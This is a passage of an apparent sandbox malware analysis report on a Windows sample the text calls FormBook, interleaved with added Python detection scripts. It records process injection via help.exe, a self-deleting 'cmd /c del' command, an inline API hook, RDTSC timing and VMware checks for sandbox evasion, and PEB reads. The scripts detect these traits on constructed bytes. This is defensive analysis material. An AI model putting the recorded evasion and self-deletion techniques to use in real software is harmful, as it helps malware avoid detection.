          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\SX365783909782021.exeUnpacked PE file: 2.2.SX365783909782021.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73762F60 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00419916 push ecx; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041692C push cs; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00416B53 push edi; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041AB2B pushad ; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C1D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419916 push ecx; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041692C push cs; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00416B53 push edi; iretd
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041AB2B pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0367D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321AB2B pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03216B53 push edi; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321692C push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D13C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219916 push ecx; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D085 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D0DB push eax; ret
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dllJump to dropped file
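The two checks listed under Data Obfuscation can be reproduced offline on a dumped image. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it decodes IMAGE_SECTION_HEADER.Characteristics into the E/R/W string the report prints and diffs an on-disk section table against the in-memory one (the basis of the "changes PE section rights" signature), then sweeps a code buffer for the push/ret gadgets of the kind reported at 2_2_0041D0D2 and neighbours. Every byte string in it is constructed for the example; the section tables and the code buffer are not taken from the sample.

```python
# Added example (not from the Joe Sandbox report or the FormBook sample):
# reproduces two of the Data Obfuscation checks above on constructed input.
# (1) decode IMAGE_SECTION_HEADER.Characteristics into the E/R/W string the
#     report prints and diff the file's table against the unpacked image's;
# (2) sweep a code buffer for 'push <something>; ret/iretd' gadgets.
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8s6I2HI"  # IMAGE_SECTION_HEADER, 40 bytes


def make_section(name: bytes, characteristics: int) -> bytes:
    """Pack one section header; sizes/offsets are zeroed because only the flags matter here."""
    return struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), 0, 0, 0, 0, 0, 0, 0, 0, characteristics)


def rights(characteristics: int) -> str:
    """E/R/W letters in the order the report uses (.text:ER, .data:RW ...)."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)


def section_rights(table: bytes) -> dict:
    """Map section name -> rights for a packed run of 40-byte section headers."""
    out = {}
    for off in range(0, len(table) - len(table) % 40, 40):
        name, *_, chars = struct.unpack_from(SECTION_HEADER, table, off)
        out[name.rstrip(b"\0").decode("ascii", "replace")] = rights(chars)
    return out


def describe(rights_map: dict) -> str:
    """Same notation as the report line: '.text:ER;.rdata:R;...'."""
    return "".join(f"{name}:{r};" for name, r in rights_map.items())


def rights_changed(disk_table: bytes, memory_table: bytes) -> list:
    """Sections whose rights differ between the file on disk and the unpacked
    image dumped from memory: the comparison the 'changes PE section rights'
    signature is built on. Returns (name, rights_on_disk, rights_in_memory)."""
    a, b = section_rights(disk_table), section_rights(memory_table)
    return [(n, a.get(n), b.get(n)) for n in sorted(set(a) | set(b)) if a.get(n) != b.get(n)]


# --- push/ret gadget sweep ---------------------------------------------------
PUSH_OPS = {0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
            0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
            0x60: "pushad", 0x0E: "push cs", 0x06: "push es", 0x16: "push ss", 0x1E: "push ds"}
RET_OPS = {0xC3: "ret", 0xCF: "iretd"}


def push_ret_gadgets(code: bytes, base: int) -> list:
    """Linear byte sweep for a push immediately followed by ret/iretd.
    A raw sweep also matches inside longer instructions, so treat hits as
    candidates to confirm in a disassembler; the sandbox only reports matches
    on decoded instructions within a recognised function."""
    return [(base + i, f"{PUSH_OPS[code[i]]}; {RET_OPS[code[i + 1]]}")
            for i in range(len(code) - 1)
            if code[i] in PUSH_OPS and code[i + 1] in RET_OPS]


# Constructed inputs: a two-section file, and the in-memory image after
# unpacking, where .text became writable and an extra .ndata section appeared.
DISK_TABLE = make_section(b".text", 0x60000020) + make_section(b".data", 0xC0000040)
MEMORY_TABLE = (make_section(b".text", 0xE0000020) + make_section(b".data", 0xC0000040)
                + make_section(b".ndata", 0xC0000080))
# Constructed code: an ordinary prologue (push ebp; mov ebp, esp) followed by
# push eax; ret / nop; pushad; ret / push cs; ret / push edi; iretd / ret.
CODE = bytes.fromhex("558bec50c39060c30ec357cfc3")

if __name__ == "__main__":
    print("file   :", describe(section_rights(DISK_TABLE)))
    print("memory :", describe(section_rights(MEMORY_TABLE)))
    print("changed:", rights_changed(DISK_TABLE, MEMORY_TABLE))
    for addr, gadget in push_ret_gadgets(CODE, 0x41D000):
        print(f"{addr:08X} {gadget}")
```

For a real dump, feed `section_rights` the 40-byte-per-entry table that starts right after the optional header (pefile exposes it as `pe.sections`), and pass the dumped `.text` bytes with its image base to `push_ret_gadgets`; the gadget addresses then line up with the `2_2_...` function addresses the report prints.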

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xED
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
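The "User mode code has changed" line comes from comparing the live prologue of an exported function with the prologue as mapped from the DLL on disk. The script below is an added example, not code from the report or the sample: it performs that comparison and decodes the first bytes against the trampolines inline hooks usually write. The clean prologue, the jmp stub and the load address are constructed placeholders (the clean bytes are a typical x64 prologue, not the real user32!PeekMessageA); only the six bytes in OBSERVED_STUB are the "new code" the report line lists, and they do not match any of the common stub shapes, so the check reports an unrecognised stub rather than a target.

```python
# Added example (not from the Joe Sandbox report or the FormBook sample):
# the comparison behind 'User mode code has changed', plus decoding of the
# usual inline-hook trampolines. All constants below are constructed
# placeholders except OBSERVED_STUB, which is the 'new code' from the report.
import struct

MASK64 = (1 << 64) - 1


def decode_stub(code: bytes, addr: int):
    """Recognise common inline-hook trampolines placed at `addr`.
    Returns (kind, target) or None when the bytes are not a known stub."""
    if code[:1] == b"\xe9" and len(code) >= 5:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp rel32", (addr + 5 + rel) & MASK64)
    if code[:2] == b"\xff\x25" and len(code) >= 6:                   # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", code, 2)[0]
        return ("jmp [rip+disp32]", (addr + 6 + disp) & MASK64)      # address of the pointer slot
    if code[:2] == b"\x48\xb8" and len(code) >= 12:                  # mov rax, imm64 ; jmp rax | push rax ; ret
        tail = code[10:12]
        if tail in (b"\xff\xe0", b"\x50\xc3"):
            kind = "mov rax, imm64; " + ("jmp rax" if tail == b"\xff\xe0" else "push rax; ret")
            return (kind, struct.unpack_from("<Q", code, 2)[0])
    if code[:1] == b"\x68" and len(code) >= 6 and code[5:6] == b"\xc3":  # push imm32 ; ret (x86)
        return ("push imm32; ret", struct.unpack_from("<I", code, 1)[0])
    return None


def check_prologue(name: str, addr: int, expected: bytes, live: bytes, n: int = 6) -> dict:
    """Compare the first n bytes read from the process (`live`) with the same
    function mapped from the DLL on disk with relocations applied (`expected`)."""
    if live[:n] == expected[:n]:
        return {"function": name, "hooked": False}
    return {"function": name, "hooked": True,
            "new_code": live[:n].hex(" "), "stub": decode_stub(live, addr)}


FUNC_ADDR = 0x7FFA12340000                          # placeholder load address (constructed)
CLEAN_PROLOGUE = bytes.fromhex("48895c240857")      # mov [rsp+8], rbx ; push rdi (constructed)
HOOKED_JMP = bytes.fromhex("e9fbff000057")          # jmp +0xFFFB ; leftover byte (constructed)
OBSERVED_STUB = bytes.fromhex("488bb88aaeed")       # 'new code' bytes from the report line

if __name__ == "__main__":
    for live in (CLEAN_PROLOGUE, HOOKED_JMP, OBSERVED_STUB):
        print(check_prologue("PeekMessageA", FUNC_ADDR, CLEAN_PROLOGUE, live))
```

When the stub is unrecognised, as with the observed bytes here, dump more than six bytes and disassemble them; the report line only preserves the first six, which is enough to flag the change but not to name the hook target.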

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SX365783909782021.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4660 | Thread sleep count: 31 > 30
          Source: C:\Windows\explorer.exe TID: 4660 | Thread sleep time: -62000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4740 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.226481174.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.219682081.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-s
          Source: explorer.exe, 00000003.00000000.247140572.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-
          Source: explorer.exe, 00000003.00000000.247457581.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.226715278.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.221477185.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.226628134.000000000871F000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAJ
          Source: explorer.exe, 00000003.00000000.224813864.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
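The RDTSC interceptor lines above and the run of fs:[00000030h] reads that follows are two static patterns worth sweeping for in any dumped 32-bit code, independent of the sandbox. The script below is an added example, not code from the report or from the sample: it finds RDTSC pairs within a short window (the shape of a "how long did that take" check that trips on hypervisor or instrumentation overhead), pulls the cycle threshold out of the `cmp eax, imm32` that normally follows the second read, and lists every `mov r32, fs:[30h]` PEB access in both encodings. The code buffer is constructed here from the instruction sequence the interceptor lines show (`rdtsc; xor ecx, ecx; add ecx, eax; rdtsc`) plus a plausible continuation; the threshold value and the PEB field reads are assumptions for the example, not bytes recovered from the sample.

```python
# Added example (not from the Joe Sandbox report or the FormBook sample):
# static sweep of a 32-bit code buffer for back-to-back RDTSC timing checks
# and fs:[30h] PEB reads. CODE is constructed from the instruction sequence
# the RDTSC interceptor lines list plus an assumed continuation.
import re

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_OFFSET = b"\x30\x00\x00\x00"


def rdtsc_pairs(code: bytes, base: int, window: int = 32) -> list:
    """Pairs of RDTSC (0F 31) within `window` bytes of each other, as
    (first_address, second_address), the form the interceptor line reports."""
    offs = [m.start() for m in re.finditer(rb"\x0f\x31", code)]
    return [(base + a, base + b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def rdtsc_threshold(code: bytes, second_rdtsc: int, lookahead: int = 16):
    """Heuristic: the first 'cmp eax, imm32' (3D imm32) shortly after the
    second RDTSC is usually the cycle budget. Returns None if not found."""
    window = code[second_rdtsc + 2:second_rdtsc + 2 + lookahead]
    i = window.find(b"\x3d")
    if i < 0 or i + 5 > len(window):
        return None
    return int.from_bytes(window[i + 1:i + 5], "little")


def peb_reads(code: bytes, base: int) -> list:
    """mov r32, fs:[30h] in both encodings: 64 A1 30000000 (eax only) and
    64 8B /r with a disp32-only modrm (mod=00, rm=101). Returns (address, reg)."""
    hits, i = [], 0
    while i + 6 <= len(code):
        if code[i] == 0x64 and code[i + 1] == 0xA1 and code[i + 2:i + 6] == PEB_OFFSET:
            hits.append((base + i, "eax"))
            i += 6
            continue
        if (i + 7 <= len(code) and code[i] == 0x64 and code[i + 1] == 0x8B
                and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == PEB_OFFSET):
            hits.append((base + i, REG32[(code[i + 2] >> 3) & 7]))
            i += 7
            continue
        i += 1
    return hits


def scan_anti_analysis(code: bytes, base: int) -> dict:
    """One pass producing the three things a triage note wants from this section."""
    pairs = rdtsc_pairs(code, base)
    return {
        "rdtsc_pairs": pairs,
        "rdtsc_thresholds": [rdtsc_threshold(code, second - base) for _, second in pairs],
        "peb_reads": peb_reads(code, base),
    }


# Constructed buffer (not bytes from the sample). Comments give the decoding.
CODE = bytes.fromhex(
    "0f31"            # rdtsc
    "31c9"            # xor ecx, ecx
    "01c1"            # add ecx, eax          (ecx = low dword of first TSC)
    "0f31"            # rdtsc
    "2bc1"            # sub eax, ecx          (elapsed cycles)
    "3d00100000"      # cmp eax, 0x1000       (assumed budget)
    "7702"            # ja  +2                (too slow: treat as instrumented)
    "64a130000000"    # mov eax, fs:[30h]     (PEB)
    "8a4002"          # mov al, [eax+2]       (PEB.BeingDebugged)
    "648b0d30000000"  # mov ecx, fs:[30h]
    "8b490c"          # mov ecx, [ecx+0Ch]    (PEB.Ldr: start of a manual API lookup)
    "c3"              # ret
)

if __name__ == "__main__":
    result = scan_anti_analysis(CODE, 0x4098E4)
    for first, second in result["rdtsc_pairs"]:
        print(f"rdtsc pair {first:08X} -> {second:08X}")
    print("thresholds:", [hex(t) if t is not None else None for t in result["rdtsc_thresholds"]])
    for addr, reg in result["peb_reads"]:
        print(f"{addr:08X} mov {reg}, fs:[30h]")
```

Run it over the dumped `.text` of process 2 with base 0x400000 and the pair addresses line up with the First/second address values in the interceptor lines; the fs:[30h] hits map onto the `2_2_00B...` and `2_2_00C...` function addresses listed below, which lie in the injected ntdll-like region rather than in the original image.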
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C541E8 mov eax, dword ptr fs:[00000030h]
